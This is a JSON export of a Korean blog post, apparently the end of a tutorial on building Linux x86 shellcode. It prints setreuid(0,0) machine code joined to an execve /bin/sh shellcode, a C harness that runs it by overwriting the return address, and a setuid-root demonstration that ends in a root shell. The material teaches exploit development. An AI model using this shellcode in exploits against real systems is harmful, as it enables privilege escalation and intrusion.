<br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; setreuid(0,0); <br \/>} <br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xc0 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %eax,%eax <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\xb0\\x46 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ mov $0x46,%al <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xdb &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %ebx,%ebx <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\x31\\xc9 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ xor %ecx,%ecx <br \/>&nbsp; &nbsp; &nbsp;&nbsp; \\xcd\\x80 &nbsp; &nbsp; &nbsp; &nbsp; \/\/ int $0x80 <br \/><br \/>\uc774\ub807\uac8c \ub9cc\ub4e4\uc5b4\uc9c4 \ucf54\ub4dc\ub97c shellcode\uc55e\uc5d0 \ubd99\uc5ec \uc544\ub798\uc640 shell\uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e0\ub4a4&nbsp; \ucef4\ud37c\uc77c \ud558\uc5ec <br \/>\uc2e4\ud589\ud654\uc77c\uc5d0 root setuid\uc744 \ubd99\uc5ec\ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test45.c <br \/>char sc[] = <br \/>\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\" &nbsp; \/\/ setreuid(0,0); <br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x31\" <br \/>\"\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test45.c -o test45 <br \/><br \/>[root@Null@Root]# chown root test45 <br \/><br \/>[root@Null@Root]# chmod 4755 test45 <br \/><br \/>[root@Null@Root]# ls -al <br \/>drwxrwxr-x &nbsp;&nbsp; 2 willy &nbsp;&nbsp; willy &nbsp; &nbsp; &nbsp;&nbsp; 4096 Sep 12 19:53 . <br \/>drwxrwxr-x &nbsp; 12 willy &nbsp;&nbsp; willy &nbsp; &nbsp; &nbsp;&nbsp; 4096 Sep&nbsp; 4 07:34 .. 
<br \/>-rwsr-xr-x &nbsp;&nbsp; 1 root &nbsp; &nbsp; willy &nbsp; &nbsp; &nbsp; 13825 Sep 12 19:53 test45 <br \/><br \/>\uc774\uc81c willy \uad8c\ud55c\uc73c\ub85c test45\ub97c \uc2e4\ud589\uc2dc\ucf1c\ubcf4\uc790.&nbsp; <br \/><br \/>[willy@Null@Root]$ .\/test45 <br \/>sh-2.04# id <br \/>uid=0(root) gid=501(willy) groups=501(willy) <br \/><br \/>\ub4dc\ub514\uc5b4 root shell\uc744 \uc5bb\uc5c8\ub2e4. \uc774\uc81c shellcode \ub9cc\ub4e4\uae30\uac00 \ubaa8\ub450 \ub05d\ub0ac\ub2e4. \uba54\ubaa8\ub9ac\uc758 \uad6c\uc870 \ubd80\ud130 \uc2dc\uc791\ud558\uc5ec,&nbsp; <br \/>\uc5b4\uc148\ube14\ub9ac\uc5b4\uc758 \uae30\ubcf8 \uad6c\uc870\uc640 \uba85\ub839\uc5b4, \uadf8\ub9ac\uace0 system call\uc744 \uc774\uc6a9\ud55c shellcode \uae4c\uc9c0..&nbsp; \uac00\ub2a5\ud55c \ud55c \ubaa8\ub4e0&nbsp; <br \/>\ub0b4\uc6a9\uc744 \uc27d\uac8c \uc774\ud574 \ud560\uc218 \uc788\ub3c4\ub85d \uc124\uba85\ud558\ub824 \ub178\ub825\ud558\uc600\ub2e4. \uc774 \ubb38\uc11c\uac00 shellcode\uc81c\uc791\uc744 \uc774\ud574\ud558\ub294\ub370 \ub3c4\uc6c0\uc774 <br \/>\ub418\uc5c8\uc73c\uba74 \ud558\ub294 \ubc14\ub7a8\uc774\ub2e4. 
\uc2dc\uac04\uc774 \uc788\ub294 \uc0ac\ub78c\uc740 \/usr\/include\/asm\/unistd.h\uc5d0 \uc788\ub294 300\uc5ec\uac1c\uc758 system <br \/>call \ud568\uc218\ub4e4 \uc911\uc5d0 \uba87\uac00\uc9c0\ub97c \uc774\uc6a9\ud558\uc5ec \uc7ac\ubbf8\uc788\ub294 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\ub294\uac83\ub3c4 \uc88b\uc744\ub4ef \ud558\ub2e4.&nbsp; <br \/>\uc554\ud2bc \ub0b4\uc6a9\uc911 \uc758\ubb38\uc774 \uc788\uac70\ub098 \uc218\uc815\ud560 \ubd80\ubd84\uc774 \uc788\uc73c\uba74 \uc5b8\uc81c\ub77c\ub3c4 \uc5f0\ub77d \ubc14\ub780\ub2e4.&nbsp; <br \/>\ucc38\uace0\ub85c OS\ub098 CPU\uac00 \ub2e4\ub978 \uacbd\uc6b0 \uba54\ubaa8\ub9ac \ubd80\ubd84\uc774\ub098 \ub808\uc9c0\uc2a4\ud130, \uadf8\ub9ac\uace0 \uc5b4\uc148\ube14\ub9ac\uc758 \uad6c\uc870\uac00 \ub2e4\ub97c\uc218 \uc788\ub2e4.&nbsp; <br \/>\uc774\ubd80\ubd84\uc5d0 \ub300\ud574\uc11c\ub294 bacchante project (http:\/\/165.246.33.21\/bacchante)\uc744 \ucc38\uace0\ud558\uace0 \uac01\uc790 \uc751\uc6a9\ud574&nbsp; <br \/>\ubcf4\uae30 \ubc14\ub780\ub2e4. 
<br \/><\/P><\/DIV>\n","protected":false},"excerpt":{"rendered":"<p>[\ubaa9\ucc28]1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b42.\uae30\ubcf8\uc801\uc778 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc758 \uc774\ud5743.C\ud504\ub85c\uadf8\ub7a8\uc744 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30.4.setreuid(0,0)\ud568\uc218 \uc258\ucf54\ub4dc\ub85c \ub9cc\ub4e4\uae30 \ubd80\ub85d : unistd.h 1.\uc5b4\uc148\ube14\ub9ac \uae30\ubcf8 \uba85\ub839\uc5b4\ub77c\ubca8 | \uc624\ud53c\ucf54\ub4dc |\uc81c1\uc624\ud53c\ub79c\ub4dc |\uc81c2\uc624\ud53c\ub79c\ub4dc | \uc124\uba85\ubb38(\uc8fc\uc11d)&#8212;&#8212;+&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8211;main: movl %esi, %ebp ; comment +&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+ |\uba85\ub839\uc5b4| \uc774\uc6a9 \ubc29\ubc95 | \uba85\ub839\uc5b4\uc758 \uc758\ubbf8 | C\uc5d0\uc11c\uc758 \uc720\uc0ac \ud45c\ud604 |+&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;+&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;+ | mov | movb $0x1,%eax | 1\uc744 eax\uc5d0 \ub123\uc74c.(1 \ubc14\uc774\ud2b8) | eax = 0x01 | | 
[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_import_markdown_pro_load_document_selector":0,"_import_markdown_pro_submit_text_textarea":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center 
center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[22],"tags":[],"class_list":["post-93","post","type-post","status-publish","format-standard","hentry","category-development_unix"],"_links":{"self":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/93","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=93"}],"version-history":[{"count":0,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/93\/revisions"}],"wp:attachment":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=93"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=93"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=93"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}